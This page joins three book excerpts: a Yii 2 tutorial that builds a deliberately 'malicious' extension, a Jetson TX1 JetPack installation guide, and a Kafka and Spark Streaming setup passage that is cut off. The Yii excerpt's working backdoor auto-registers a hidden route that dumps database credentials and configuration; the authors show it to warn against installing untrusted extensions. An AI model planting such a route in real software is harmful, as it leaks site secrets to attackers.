In this article by Mark Safronov, co-author of the book Web Application Development with Yii 2 and PHP, we'll learn to create our own extension using a simple way of installation. There is a process we have to follow, though, as some preparation will be needed to wire up your classes to the Yii application. The whole article will be devoted to this process. (For more resources related to this topic, see here.)

Extension idea

So, how are we going to extend the Yii 2 framework as an example for this article? Let's become vile this time and make a malicious extension, which will provide a sort of phishing backdoor for us. Never do exactly the thing we'll describe in this article! It'll not give you instant access to the attacked website anyway, but a skilled black hat hacker can easily get enough information to achieve total control over your application.

The idea is this: our extension will provide a special route (a controller with a single action inside), which will dump the complete application configuration to the web page. Let's say it'll be reachable from the route /app-info/configuration. We cannot, however, just get the contents of the configuration file itself, at least not reliably. At the point where we can attach ourselves to the application instance, the original configuration array is inaccessible, and even if it were accessible, we couldn't be sure about where it came from anyway. So, we'll inspect the runtime status of the application and return the most important pieces of information we can fetch at the stage of the controller action resolution. That's the exact payload we want to introduce:

public function actionConfiguration()
{
    $app = Yii::$app;
    $config = [
        'components' => $app->components,
        'basePath' => $app->basePath,
        'params' => $app->params,
        'aliases' => Yii::$aliases
    ];
    return \yii\helpers\Json::encode($config);
}

The preceding code is the core of the extension and is assumed in the following sections. In fact, if you know the value of the basePath setting of the application, a list of its aliases, the settings for the components (among which the DB connection may reside), and all custom parameters that developers set manually, you can map the target application quite reliably. Given that you know all the credentials this way, you have an enormous amount of highly valuable information about the application. All you need to do now is make the user install this extension.

Creating the extension contents

Our plan is as follows:

We will develop our extension in a folder that is different from our example CRM application.
This extension will be named yii2-malicious, to be consistent with the naming of other Yii 2 extensions.
Given the kind of payload we saw earlier, our extension will consist of a single controller and some special wiring code (which we haven't learned about yet) to automatically attach this controller to the application.
Finally, to consider this subproject a true Yii 2 extension and not just some random library, we want it to be installable in the same way as other Yii 2 extensions.

Preparing the boilerplate code for the extension

Let's make a separate directory, initialize the Git repository there, and add the AppInfoController to it.
In the bash command line, it can be achieved by the following commands:

$ mkdir yii2-malicious && cd $_
$ git init
$ > AppInfoController.php

Inside the AppInfoController.php file, we'll write the usual boilerplate code for the Yii 2 controller as follows:

namespace malicious;

use yii\web\Controller;

class AppInfoController extends Controller
{
    // Action here
}

Put the action defined in the preceding code snippet inside this controller and we're done with it. Note the namespace: it is not the same as the folder this controller is in, and this is not according to our usual auto-loading rules. We will see later in this article that this is not an issue, because of how Yii 2 treats the auto-loading of classes from extensions.

Now this controller needs to be wired to the application somehow. We already know that the application has a special property called controllerMap, in which we can manually attach controller classes. However, how do we do this automatically, better yet, right at application startup time? Yii 2 has a special feature called bootstrapping to support exactly this: to attach some activity at the beginning of the application lifetime, though not at the very beginning, but certainly before the request is handled. This feature is tightly related to the extensions concept in Yii 2, so it's a perfect time to explain it.

FEATURE – bootstrapping

To explain the bootstrapping concept in short, you can declare some components of the application in the yii\base\Application::$bootstrap property. They'll be properly instantiated at the start of the application. If any of these components implements the BootstrapInterface interface, its bootstrap() method will be called, so you'll get the application initialization enhancement for free. Let's elaborate on this.

The yii\base\Application::$bootstrap property holds an array of generic values that you tell the framework to initialize beforehand. It's basically an improvement over the preload concept from Yii 1.x. You can specify four kinds of values to initialize, as follows:

The ID of an application component
The ID of some module
A class name
A configuration array

If it's the ID of a component, this component is fully initialized. If it's the ID of a module, this module is fully initialized. This matters greatly because Yii 2 employs lazy loading on the components and modules system, and they are usually initialized only when explicitly referenced. Being bootstrapped means that their initialization, regardless of whether it's slow or resource-consuming, always happens, and always happens at the start of the application. If you have a component and a module with identical IDs, then the component will be initialized and the module will not be initialized!

If the value mentioned in the bootstrap property is a class name or a configuration array, then an instance of the class in question is created using the yii\BaseYii::createObject() facility. The instance created will be thrown away immediately if it doesn't implement the yii\base\BootstrapInterface interface. If it does, its bootstrap() method will be called. Then, the object will be thrown away.

So, what's the effect of this bootstrapping feature? We already used this feature while installing the debug extension. We had to bootstrap the debug module using its ID, for it to be able to attach the event handler so that we would get the debug toolbar at the bottom of each page of our web application.
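To make the four kinds of bootstrap values more concrete, the following is a hypothetical fragment of an application configuration; the Warmup and Metrics class names are invented purely for illustration:

// config/web.php (fragment), illustrative only
return [
    'bootstrap' => [
        'log',                       // the ID of an application component
        'debug',                     // the ID of a module
        'app\components\Warmup',     // a class name; its bootstrap() method is
                                     // called if it implements BootstrapInterface
        ['class' => 'app\components\Metrics'], // a configuration array
    ],
    // ... the rest of the application configuration ...
];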
This feature is indispensable if you need to be sure that some activity will always take place at the start of the application lifetime. The BootstrapInterface interface is basically the incarnation of a command pattern. By implementing this interface, we gain the ability to attach any activity, not necessarily bound to the component or module, to the application initialization. FEATURE – extension registering The bootstrapping feature is repeated in the handling of the yiibaseApplication::$extensions property. This property is the only place where the concept of extension can be seen in the Yii framework. Extensions in this property are described as a list of arrays, and each of them should have the following fields: name: This field will be with the name of the extension. version: This field will be with the extension's version (nothing will really check it, so it's only for reference). bootstrap: This field will be with the data for this extension's Bootstrap. This field is filled with the same elements as that of Yii::$app->bootstrap described previously and has the same semantics. alias: This field will be with the mapping from Yii 2 path aliases to real directory paths. When the application registers the extension, it does two things in the following order: It registers the aliases from the extension, using the Yii::setAlias() method. It initializes the thing mentioned in the bootstrap of the extension in exactly the same way we described in the previous section. Note that the extensions' bootstraps are processed before the application's bootstraps. Registering aliases is crucial to the whole concept of extension in Yii 2. It's because of the Yii 2 PSR-4 compatible autoloader. Here is the quote from the documentation block for the yiiBaseYii::autoload() method: If the class is namespaced (e.g. yiibaseComponent), it will attempt to include the file associated with the corresponding path alias (e.g. @yii/base/Component.php). This autoloader allows loading classes that follow the PSR-4 standard and have its top-level namespace or sub-namespaces defined as path aliases. The PSR-4 standard is available online at http://www.php-fig.org/psr/psr-4/. Given that behavior, the alias setting of the extension is basically a way to tell the autoloader the name of the top-level namespace of the classes in your extension code base. Let's say you have the following value of the alias setting of your extension: "alias" => ["@companyname/extensionname" => "/some/absolute/path"] If you have the /some/absolute/path/subdirectory/ClassName.php file, and, according to PSR-4 rules, it contains the class whose fully qualified name is companynameextensionnamesubdirectoryClassName, Yii 2 will be able to autoload this class without problems. Making the bootstrap for our extension – hideous attachment of a controller We have a controller already prepared in our extension. Now we want this controller to be automatically attached to the application under attack when the extension is processed. This is achievable using the bootstrapping feature we just learned. 
Let's create the maliciousBootstrap class for this cause inside the code base of our extension, with the following boilerplate code: <?phpnamespace malicious;use yiibaseBootstrapInterface;class Bootstrap implements BootstrapInterface{/** @param yiiwebApplication $app */public function bootstrap($app){// Controller addition will be here.}} With this preparation, the bootstrap() method will be called at the start of the application, provided we wire everything up correctly. But first, we should consider how we manipulate the application to make use of our controller. This is easy, really, because there's the yiiwebApplication::$controllerMap property (don't forget that it's inherited from yiibaseModule, though). We'll just do the following inside the bootstrap() method: $app->controllerMap['app-info'] = 'maliciousAppInfoController'; We will rely on the composer and Yii 2 autoloaders to actually find maliciousAppInfoController. Just imagine that you can do anything inside the bootstrap. For example, you can open the CURL connection with some botnet and send the accumulated application information there. Never believe random extensions on the Web. This actually concludes what we need to do to complete our extension. All that's left now is to make our extension installable in the same way as other Yii 2 extensions we were using up until now. If you need to attach this malicious extension to your application manually, and you have a folder that holds the code base of the extension at the path /some/filesystem/path, then all you need to do is to write the following code inside the application configuration:  'extensions' => array_merge((require __DIR__ . '/../vendor/yiisoft/extensions.php'),['maliciousapp-info' => ['name' => 'Application Information Dumper','version' => '1.0.0','bootstrap' => 'maliciousBootstrap','alias' => ['@malicious' =>'/some/filesystem/path']// that's the path to extension]]) Please note the exact way of specifying the extensions setting. We're merging the contents of the extensions.php file supplied by the Yii 2 distribution from composer and our own manual definition of the extension. This extensions.php file is what allows Yiisoft to distribute the extensions in such a way that you are able to install them by a simple, single invocation of a require composer command. Let's learn now what we need to do to repeat this feature. Making the extension installable as... erm, extension First, to make it clear, we are talking here only about the situation when Yii 2 is installed by composer, and we want our extension to be installable through the composer as well. This gives us the baseline under all of our assumptions. Let's see the extensions that we need to install: Gii the code generator The Twitter Bootstrap extension The Debug extension The SwiftMailer extension We can install all of these extensions using composer. We introduce the extensions.php file reference when we install the Gii extension. Have a look at the following code: 'extensions' => (require __DIR__ . '/../vendor/yiisoft/extensions.php') If we open the vendor/yiisoft/extensions.php file (given that all extensions from the preceding list were installed) and look at its contents, we'll see the following code (note that in your installation, it can be different): <?php $vendorDir = dirname(__DIR__); return array ( 'yiisoft/yii2-bootstrap' => array ( 'name' => 'yiisoft/yii2-bootstrap', 'version' => '9999999-dev', 'alias' => array ( '@yii/bootstrap' => $vendorDir . 
'/yiisoft/yii2-bootstrap', ), ), 'yiisoft/yii2-swiftmailer' => array ( 'name' => 'yiisoft/yii2-swiftmailer', 'version' => '9999999-dev', 'alias' => array ( '@yii/swiftmailer' => $vendorDir . ' /yiisoft/yii2-swiftmailer', ), ), 'yiisoft/yii2-debug' => array ( 'name' => 'yiisoft/yii2-debug', 'version' => '9999999-dev', 'alias' => array ( '@yii/debug' => $vendorDir . '/yiisoft/yii2-debug', ), ), 'yiisoft/yii2-gii' => array ( 'name' => 'yiisoft/yii2-gii', 'version' => '9999999-dev', 'alias' => array ( '@yii/gii' => $vendorDir . '/yiisoft/yii2-gii', ), ), ); One extension was highlighted to stand out from the others. So, what does all this mean to us? First, it means that Yii 2 somehow generates the required configuration snippet automatically when you install the extension's composer package Second, it means that each extension provided by the Yii 2 framework distribution will ultimately be registered in the extensions setting of the application Third, all the classes in the extensions are made available in the main application code base by the carefully crafted alias settings inside the extension configuration Fourth, ultimately, easy installation of Yii 2 extensions is made possible by some integration between the Yii framework and the composer distribution system The magic is hidden inside the composer.json manifest of the extensions built into Yii 2. The details about the structure of this manifest are written in the documentation of composer, which is available at https://getcomposer.org/doc/04-schema.md. We'll need only one field, though, and that is type. Yii 2 employs a special type of composer package, named yii2-extension. If you check the manifests of yii2-debug, yii2-swiftmail and other extensions, you'll see that they all have the following line inside: "type": "yii2-extension", Normally composer will not understand that this type of package is to be installed. But the main yii2 package, containing the framework itself, depends on the special auxiliary yii2-composer package: "require": {… other requirements ..."yiisoft/yii2-composer": "*", This package provides Composer Custom Installer (read about it at https://getcomposer.org/doc/articles/custom-installers.md), which enables this package type. The whole point in the yii2-extension package type is to automatically update the extensions.php file with the information from the extension's manifest file. Basically, all we need to do now is to craft the correct composer.json manifest file inside the extension's code base. Let's write it step by step. Preparing the correct composer.json manifest We first need a block with an identity. Have a look at the following lines of code: "name": "malicious/app-info","version": "1.0.0","description": "Example extension which reveals importantinformation about the application","keywords": ["yii2", "application-info", "example-extension"],"license": "CC-0", Technically, we must provide only name. Even version can be omitted if our package meets two prerequisites: It is distributed from some version control system repository, such as the Git repository It has tags in this repository, correctly identifying the versions in the commit history And we do not want to bother with it right now. Next, we need to depend on the Yii 2 framework just in case. 
Normally, users will install the extension after the framework is already in place, but in the case of the extension already being listed in the require section of composer.json, among other things, we cannot be sure about the exact ordering of the require statements, so it's better (and easier) to just declare dependency explicitly as follows: "require": {"yiisoft/yii2": "*"}, Then, we must provide the type as follows: "type": "yii2-extension", After this, for the Yii 2 extension installer, we have to provide two additional blocks; autoload will be used to correctly fill the alias section of the extension configuration. Have a look at the following code: "autoload": {"psr-4": {"malicious\": ""}}, What we basically mean is that our classes are laid out according to PSR-4 rules in such a way that the classes in the malicious namespace are placed right inside the root folder. The second block is extra, in which we tell the installer that we want to declare a bootstrap section for the extension configuration: "extra": {"bootstrap": "malicious\Bootstrap"}, Our manifest file is complete now. Commit everything to the version control system: $ git commit -a -m "Added the Composer manifest file to repo" Now, we'll add the tag at last, corresponding to the version we declared as follows: $ git tag 1.0.0 We already mentioned earlier the purpose for which we're doing this. All that's left is to tell the composer from where to fetch the extension contents. Configuring the repositories We need to configure some kind of repository for the extension now so that it is installable. The easiest way is to use the Packagist service, available at https://packagist.org/, which has seamless integration with composer. It has the following pro and con: Pro: You don't need to declare anything additional in the composer.json file of the application you want to attach the extension to Con: You must have a public VCS repository (either Git, SVN, or Mercurial) where your extension is published In our case, where we are just in fact learning about how to install things using composer, we certainly do not want to make our extension public. Do not use Packagist for the extension example we are building in this article. Let's recall our goal. Our goal is to be able to install our extension by calling the following command at the root of the code base of some Yii 2 application: $ php composer.phar require "malicious/app-info:*" After that, we should see something like the following screenshot after requesting the /app-info/configuration route: This corresponds to the following structure (the screenshot is from the http://jsonviewer.stack.hu/ web service): Put the extension to some public repository, for example, GitHub, and register a package at Packagist. This command will then work without any preparation in the composer.json manifest file of the target application. But in our case, we will not make this extension public, and so we have two options left for us. The first option, which is perfectly suited to our learning cause, is to use the archived package directly. 
For this, you have to add the repositories section to composer.json in the code base of the application you want to add the extension to: "repositories": [// definitions of repositories for the packages required by thisapplication] To specify the repository for the package that should be installed from the ZIP archive, you have to grab the entire contents of the composer.json manifest file of this package (in our case, our malicious/app-info extension) and put them as an element of the repositories section, verbatim. This is the most complex way to set up the composer package requirement, but this way, you can depend on absolutely any folder with files (packaged into an archive). Of course, the contents of composer.json of the extension do not specify the actual location of the extension's files. You have to add this to repositories manually. In the end, you should have the following additional section inside the composer.json manifest file of the target application: "repositories": [{"type": "package","package": {// … skipping whatever were copied verbatim from the composer.jsonof extension..."dist": {"url": "/home/vagrant/malicious.zip", // example filelocation"type": "zip"}}}] This way, we specify the location of the package in the filesystem of the same machine and tell the composer that this package is a ZIP archive. Now, you should just zip the contents of the yii2-malicious folder we have created for the extension, put them somewhere at the target machine, and provide the correct URL. Please note that it's necessary to archive only the contents of the extension and not the folder itself. After this, you run composer on the machine that really has this URL accessible (you can use http:// type of URLs, of course, too), and then you get the following response from composer: To check that Yii 2 really installed the extension, you can open the file vendor/yiisoft/extensions.php and check whether it contains the following block now: 'malicious/app-info' =>array ('name' => 'malicious/app-info','version' => '1.0.0.0','alias' =>array ('@malicious' => $vendorDir . '/malicious/app-info',),'bootstrap' => 'malicious\Bootstrap',), (The indentation was preserved as is from the actual file.) If this block is indeed there, then all you need to do is open the /app-info/configuration route and see whether it reports JSON to you. It should. The pros and cons of the file-based installation are as follows: Pros Cons You can specify any file as long as it is reachable by some URL. The ZIP archive management capabilities exist on virtually any kind of platform today. There is too much work in the composer.json manifest file of the target application. The requirement to copy the entire manifest to the repositories section is overwhelming and leads to code duplication. You don't need to set up any version control system repository. It's of dubious benefit though. The manifest from the extension package will not be processed at all. This means that you cannot just strip the entry in repositories, leaving only the dist and name sections there, because the Yii 2 installer will not be able to get to the autoloader and extra sections. The last method is to use the local version control system repository. We already have everything committed to the Git repository, and we have the correct tag placed here, corresponding to the version we declared in the manifest. This is everything we need to prepare inside the extension itself. 
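For reference, assembling all the pieces shown above, the complete composer.json manifest of the malicious/app-info extension would look roughly like the following sketch (in real JSON, the backslashes in the namespace have to be escaped):

{
    "name": "malicious/app-info",
    "version": "1.0.0",
    "description": "Example extension which reveals important information about the application",
    "keywords": ["yii2", "application-info", "example-extension"],
    "license": "CC-0",
    "type": "yii2-extension",
    "require": {
        "yiisoft/yii2": "*"
    },
    "autoload": {
        "psr-4": {
            "malicious\\": ""
        }
    },
    "extra": {
        "bootstrap": "malicious\\Bootstrap"
    }
}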
Now, we need to modify the target application's manifest to add the repositories section in the same way we did previously, but this time we will introduce a lot less code there: "repositories": [{"type": "git","url": "/home/vagrant/yii2-malicious/" // put your own URLhere}] All that's needed from you is to specify the correct URL to the Git repository of the extension we were preparing at the beginning of this article. After you specify this repository in the target application's composer manifest, you can just issue the desired command: $ php composer.phar require "malicious/app-info:1.0.0" Everything will be installed as usual. Confirm the successful installation again by having a look at the contents of vendor/yiisoft/extensions.php and by accessing the /app-info/configuration route in the application. The pros and con of the repository-based installation are as follows: Pro: Relatively little code to write in the application's manifest. Pro: You don't need to really publish your extension (or the package in general). In some settings, it's really useful, for closed-source software, for example. Con: You still have to meddle with the manifest of the application itself, which can be out of your control and in this case, you'll have to guide your users about how to install your extension, which is not good for PR. In short, the following pieces inside the composer.json manifest turn the arbitrary composer package into the Yii 2 extension: First, we tell composer to use the special Yii 2 installer for packages as follows: "type": "yii2-extension" Then, we tell the Yii 2 extension installer where the bootstrap for the extension (if any) is as follows: "extra": {"bootstrap": "<Fully qualified name>"} Next, we tell the Yii 2 extension installer how to prepare aliases for your extension so that classes can be autoloaded as follows: "autoloader": {"psr-4": { "namespace": "<folder path>"}} Finally, we add the explicit requirement of the Yii 2 framework itself in the following code, so we'll be sure that the Yii 2 extension installer will be installed at all: "require": {"yiisoft/yii2": "*"} Everything else is the details of the installation of any other composer package, which you can read in the official composer documentation. Summary In this article, we looked at how Yii 2 implements its extensions so that they're easily installable by a single composer invocation and can be automatically attached to the application afterwards. We learned that this required some level of integration between these two systems, Yii 2 and composer, and in turn this requires some additional preparation from you as a developer of the extension. We used a really silly, even a bit dangerous, example for extension. It was for three reasons: The extension was fun to make (we hope) We showed that using bootstrap mechanics, we can basically automatically wire up the pieces of the extension to the target application without any need for elaborate manual installation instructions We showed the potential danger in installing random extensions from the Web, as an extension can run absolutely arbitrary code right at the application initialization and more than that, at each request made to the application We have discussed three methods of distribution of composer packages, which also apply to the Yii 2 extensions. The general rule of thumb is this: if you want your extension to be publicly available, just use the Packagist service. 
In any other case, use the local repositories, as you can use both local filesystem paths and web URLs. We looked at the option to attach the extension completely manually, not using the composer installation at all. Resources for Article: Further resources on this subject: Yii: Adding Users and User Management to Your Site [Article] Meet Yii [Article] Yii 1.1: Using Zii Components [Article]

Working on Jetson TX1 Development Board [Tutorial]

Amrata Joshi
03 Mar 2019
11 min read
When high-end visual computing and computer vision applications need to be deployed in real-life scenarios, then embedded development platforms are required, which can do computationally intensive tasks efficiently. Platforms such as Raspberry Pi can use OpenCV for computer vision applications and camera-interfacing capability, but it is very slow for real-time applications. Nvidia, which specializes in GPU manufacturing, has developed modules that use GPUs for computationally intensive tasks. These modules can be used to deploy computer vision applications on embedded platforms and include Jetson TK1, Jetson TX1, and Jetson TX2. Jetson TK1 is the preliminary board and contains 192 CUDA cores with the Nvidia Kepler GPU.  Jetson TX1 is intermediate in terms of processing speed, with 256 CUDA cores with Maxwell architecture, operating at 998 MHz along with ARM CPU. Jetson TX2 is highest in terms of processing speed and price. It comprises 256 CUDA cores with Pascal architecture operating at 1,300 MHz. This article is an excerpt taken from the book Hands-On GPU-Accelerated Computer Vision with OpenCV and CUDA. This book covers CUDA applications, threads, synchronization and memory, computer vision operations and more.  This article covers the Jetson TX1 Development Board, features and applications of the Jetson TX1 Development Board and basic requirements and steps to install JetPack on the Jetson TX1 Development Board. This article requires a good understanding of the Linux operating system (OS) and networking. It also requires any Nvidia GPU development board, such as Jetson TK1, TX1, or TX2. The JetPack installation file can be downloaded from Nvidia's official website. Jetson TX1 is a small system on a module developed specifically for demanding embedded applications. It is Linux-based and offers super-computing performance at the level of teraflops, which can be utilized for computer vision and deep learning applications. The Jetson TX1 module is shown in the following photograph: The size of the module is 50 x 87 mm, which makes it easy to integrate into any system. Nvidia also offers the Jetson TX1 Development Board, which houses this GPU for prototyping applications in a short amount of time. The whole development kit is shown in the following photograph: As can be seen from the photograph, apart from the GPU module, the development kit contains a camera module, USB ports, an Ethernet port, a heat sink, fan, and antennas. It is backed by a software ecosystem including JetPack, Linux for Tegra, CUDA Toolkit, cuDNN, OpenCV, and VisionWorks. This makes it ideal for developers who are doing research into deep learning and computer vision for rapid prototyping. The features of the Jetson TX1 development kit are explained in detail in the following section. Features of the Jetson TX1 The Jetson TX1 development kit has many features that make it ideal for super-computing tasks: It is a system on a chip built using 20 nm technology, and comprises an ARM Cortex A57 quad-core CPU operating at 1.73 GHz and a 256 core Maxwell GPU operating at 998 Mhz. It has 4 GB of DDR4 memory with a data bus of 64 bits working at a speed of 1,600 MHz, which is equivalent to 25.6 GB/s. It contains a 5 MP MIPI CSI-2 camera module. It supports up to six two lane or three four lane cameras at 1,220 MP/s. The development kit also has a normal USB 3.0 type A port and micro USB port for connecting a mouse, a keyboard, and USB cameras to the board. 
It also has an Ethernet port and Wi-Fi connectivity for network connection. It can be connected to an HDMI display device via the HDMI port. The kit contains a heat sink and a fan for cooling down the GPU device at its peak performance. It draws as little as 1 watt of power in an idle condition, around 8-10 watts under normal load, and up to 15 watts when the module is fully utilized. It can process 258 images/second with a power dissipation of 5.7 watts, which is equivalent to the performance/watt value of 45. A normal i7 CPU processor has a performance of 242 images/second at 62.5 watts, which is equivalent to a performance/watt value of 3.88. So Jetson TX1 is 11.5 times better than an i7 processor. Applications of Jetson TX1 Jetson TX1 can be used in many deep learning and computer vision applications that require computationally intensive tasks. Some of the areas and applications in which Jetson TX1 can be used are as follows: It can be used in building autonomous machines and self-driving cars for various computationally intensive tasks. It can be used in various computer vision applications such as object detection, classification, and segmentation. It can also be used in medical imaging for the analysis of MRI images and computed tomography (CT) images. It can be used to build smart video surveillance systems that can help in crime monitoring or traffic monitoring. It can be used in bioinformatics and computational chemistry for simulating DNA genes, sequencing, protein docking, and so on. It can be used in various defense equipment where fast computing is required. Installation of JetPack on Jetson TX1 The Jetson TX1 comes with a preinstalled Linux OS. The Nvidia drivers for it should be installed when it is booted for the first time. The commands to do it are as follows: cd ${HOME}/NVIDIA-INSTALLER sudo ./installer.sh When TX1 is rebooted after these two commands, the Linux OS with user interface will start. Nvidia offers a software development kit (SDK), which contains all of the software needed for building computer vision and deep learning applications, along with the target OS to flash the development board. This SDK is called JetPack. The latest JetPack contains Linux for Tegra (L4T) board support packages; TensorRT, which is used for deep learning inference in computer vision applications; the latest CUDA toolkit, cuDNN, which is a CUDA deep neural network library; VisionWorks, which is also used for computer vision and deep learning applications; and OpenCV. All of the packages will be installed by default when you install JetPack. This section describes the procedure to install JetPack on the board. The procedure is long, tedious, and a little bit complex for a newcomer to Linux. So, just follow the steps and screenshots given in the following section carefully. Basic requirements for installation There are a few basic requirements for the installation of JetPack on TX1. JetPack can't be installed directly on the board, so a PC or virtual machine that runs Ubuntu 14.04 is required as a host PC. The installation is not checked with the latest version of Ubuntu, but you are free to play around with it. The Jetson TX1 board needs peripherals such as a mouse, keyboard, and monitor, which can be connected to the USB and HDMI ports. The Jetson TX1 board should be connected to the same router as the host machine via an Ethernet cable. 
The installation will also require a micro USB to USB cable to connect the board with a PC for transferring packages on the board via serial transfer. Note down the IP address of the board by checking the router configuration. If all requirements are satisfied, then move to the following section for the installation of JetPack. Steps for installation This section describes the steps to install the latest JetPack version, accompanied by screenshots. All of the steps need to be executed on the host machine, which is running Ubuntu 14.04:  Download the latest JetPack version from the official Nvidia site by following the link, https://developer.nvidia.com/embedded/jetpack, and clicking on the download button, as shown in the following screenshot: JetPack 3.3 is used to demonstrate the installation procedure. The name of the downloaded file is JetPack-L4T-3.3-linux-x64_b39.run. Create a folder on Desktop named jetpack and copy this file in that folder, as shown in the following screenshot: Start a Terminal in that folder by right-clicking and selecting the Open option. The file needs to be executed, so it should have an execute permission. If that is not the case, change the permission and then start the installer, as shown in the screenshot: It will start an installation wizard for JetPack 3.3 as shown in the following screenshot. Just click on Next in this window: The wizard will ask for directories where the packages will be downloaded and installed. You can choose the current directory for installation and create a new folder in this directory for saving downloaded packages, as shown in the following screenshot. Then click on Next: The installation wizard will ask you to choose the development board on which the JetPack packages are to be installed. Select Jetson TX1, as shown in the following screenshot, and click on Next: The components manager window will be displayed, which shows which packages will be downloaded and installed. It will show packages such as CUDA Toolkit, cuDNN, OpenCV, and VisionWorks, along with the OS image, as shown in the following screenshot:  It will ask to accept the license agreement. So click on Accept all, as shown in the following screenshot, and click on Next: It will start to download the packages, as shown in the following screenshot: When all of the packages are downloaded and installed, click on Next to complete the installation on the host. It will display the following window: It will ask you to select a network layout of how the board is connected to the host PC. The board and host PC are connected to the same router, so the first option, which tells the device to access the internet via the same router or switch, is selected, as shown in the following screenshot, and then click Next: It will ask for the interface used to connect the board to the network. We have to use an Ethernet cable to connect the router to the board, so we will select the eth0 interface, as shown in the following screenshot: This will finish the installation on the host and it will show the summary of the packages that will be transferred and installed on the board. When you click Next in the window, it will show you the steps to connect the board to the PC via the micro USB to USB cable and to boot the board in Force USB Recovery Mode. The window with the steps are shown as follows: To go into force recovery mode, after pressing the POWER button, press the FORCE RECOVERY button and, while pressing it, press and release the RESET button. Then release the FORCE RECOVERY button. 
The device will boot in force recovery mode. Type the lsusb command in the window; it will start transferring packages on to the device if it is correctly connected. If you are using a virtual machine, then you have to enable the device from the USB settings of the virtual machine. Also, select USB 3.0 controller if it's not selected. The process that starts after typing the lsusb command is shown as follows: The process will flash the OS on the device. This process can take a long time, up to an hour to complete. It will ask for resetting the device after the flashing has completed an IP address for ssh. Write down the IP address noted earlier, along with the default username and password, which is ubuntu, and click Next. The following window will be displayed after that: Click on Next and it will push all packages, such as CUDA Toolkit, VisionWorks, OpenCV, and Multimedia, onto the device. The following window will be displayed: After the process is completed, it will ask whether to delete all the downloaded packages during the process. If you want to delete, then tick on the checkbox or keep it as it is, as shown in the following screenshot: Click on Next and the installation process will be finished. Reboot the Jetson TX1 Development Board and it will boot in the normal Ubuntu OS. You will also observe sample examples of all the packages that are installed. This article introduced the Jetson TX1 Development Board for deploying computer vision and deep learning applications on embedded platforms. It also covers features and applications of the Jetson TX1 Development Board and basic requirements and steps to install JetPack on the Jetson TX1 Development Board. To know more about Jetson TX1 and CUDA applications, check out the book  Hands-On GPU-Accelerated Computer Vision with OpenCV and CUDA. NVIDIA makes its new “brain for autonomous AI machines”, Jetson AGX Xavier Module, available for purchase NVIDIA announces pre-orders for the Jetson Xavier Developer Kit, an AI chip for autonomous machines, at $2,499 NVIDIA launches GeForce Now’s (GFN) ‘recommended router’ program to enhance the overall performance and experience of GFN
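Once the board reboots into Ubuntu, a quick sanity check of the installed components can be run from a terminal on the Jetson itself. The following commands are only a sketch; the exact CUDA version, paths, and sample locations depend on the JetPack release that was flashed:

# Make sure the CUDA tools are on the PATH (adjust the path to your CUDA version)
export PATH=/usr/local/cuda/bin:$PATH
nvcc --version

# Build and run the bundled deviceQuery sample to confirm the GPU is visible
cd /usr/local/cuda/samples/1_Utilities/deviceQuery
sudo make
./deviceQuery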

Implementing fault-tolerance in Spark Streaming data processing applications with Apache Kafka

Pravin Dhandre
01 Feb 2018
16 min read
This article is an excerpt from a book written by Rajanarayanan Thottuvaikkatumana titled Apache Spark 2 for Beginners. The book is a developer's guide to developing large-scale and distributed data processing applications in a business environment.

Data processing is generally carried out in two ways: batch processing or stream processing. This article will help you learn how to process your data uninterruptedly and build fault tolerance as and when the data gets generated in real time.

Message queueing systems with publish-subscribe capability are generally used for processing messages. Traditional message queueing systems failed to perform because of the huge volume of messages to be processed per second for the needs of large-scale data processing applications. Kafka is a publish-subscribe messaging system used by many IoT applications to process a huge number of messages. The following capabilities of Kafka made it one of the most widely used messaging systems:

Extremely fast: Kafka can process huge amounts of data by handling reading and writing in short intervals of time from many application clients
Highly scalable: Kafka is designed to scale up and scale out to form a cluster using commodity hardware
Persists a huge number of messages: Messages reaching Kafka topics are persisted into secondary storage, while at the same time it handles the huge number of messages flowing through

The following are some of the important elements of Kafka, and are terms to be understood before proceeding further:

Producer: The real source of the messages, such as weather sensors or a mobile phone network
Broker: The Kafka cluster, which receives and persists the messages published to its topics by various producers
Consumer: The data processing applications subscribed to the Kafka topics that consume the messages published to the topics

The same log event processing application use case discussed in the preceding section is used again here to elucidate the usage of Kafka with Spark Streaming. Instead of collecting the log event messages from the TCP socket, here the Spark Streaming data processing application will act as a consumer of a Kafka topic, and the messages published to the topic will be consumed. The Spark Streaming data processing application uses version 0.8.2.2 of Kafka as the message broker, and the assumption is that the reader has already installed Kafka, at least in standalone mode.

The following activities are to be performed to make sure that Kafka is ready to process the messages produced by the producers and that the Spark Streaming data processing application can consume those messages:

Start the Zookeeper that comes with the Kafka installation.
Start the Kafka server.
Create a topic for the producers to send the messages to.
Pick up one Kafka producer and start publishing log event messages to the newly created topic.
Use the Spark Streaming data processing application to process the log events published to the newly created topic.
Starting Zookeeper and Kafka The following scripts are run from separate terminal windows in order to start Zookeeper and the Kafka broker, and to create the required Kafka topics: $ cd $KAFKA_HOME $ $KAFKA_HOME/bin/zookeeper-server-start.sh $KAFKA_HOME/config/zookeeper.properties [2016-07-24 09:01:30,196] INFO binding to port 0.0.0.0/0.0.0.0:2181 (org.apache.zookeeper.server.NIOServerCnxnFactory) $ $KAFKA_HOME/bin/kafka-server-start.sh $KAFKA_HOME/config/server.properties [2016-07-24 09:05:06,381] INFO 0 successfully elected as leader (kafka.server.ZookeeperLeaderElector) [2016-07-24 09:05:06,455] INFO [Kafka Server 0], started (kafka.server.KafkaServer) $ $KAFKA_HOME/bin/kafka-topics.sh --create --zookeeper localhost:2181 -- replication-factor 1 --partitions 1 --topic sfb Created topic "sfb". $ $KAFKA_HOME/bin/kafka-console-producer.sh --broker-list localhost:9092 -- topic sfb The Kafka message producer can be any application capable of publishing messages to the Kafka topics. Here, the kafka-console-producer that comes with Kafka is used as the producer of choice. Once the producer starts running, whatever is typed into its console window will be treated as a message that is published to the chosen Kafka topic. The Kafka topic is given as a command line argument when starting the kafka-console-producer. The submission of the Spark Streaming data processing application that consumes log event messages produced by the Kafka producer is slightly different from the application covered in the preceding section. Here, many Kafka jar files are required for the data processing. Since they are not part of the Spark infrastructure, they have to be submitted to the Spark cluster. The following jar files are required for the successful running of this application: $KAFKA_HOME/libs/kafka-clients-0.8.2.2.jar $KAFKA_HOME/libs/kafka_2.11-0.8.2.2.jar $KAFKA_HOME/libs/metrics-core-2.2.0.jar $KAFKA_HOME/libs/zkclient-0.3.jar Code/Scala/lib/spark-streaming-kafka-0-8_2.11-2.0.0-preview.jar Code/Python/lib/spark-streaming-kafka-0-8_2.11-2.0.0-preview.jar In the preceding list of jar files, the maven repository co-ordinate for spark-streamingkafka-0-8_2.11-2.0.0-preview.jar is "org.apache.spark" %% "sparkstreaming-kafka-0-8" % "2.0.0-preview". This particular jar file has to be 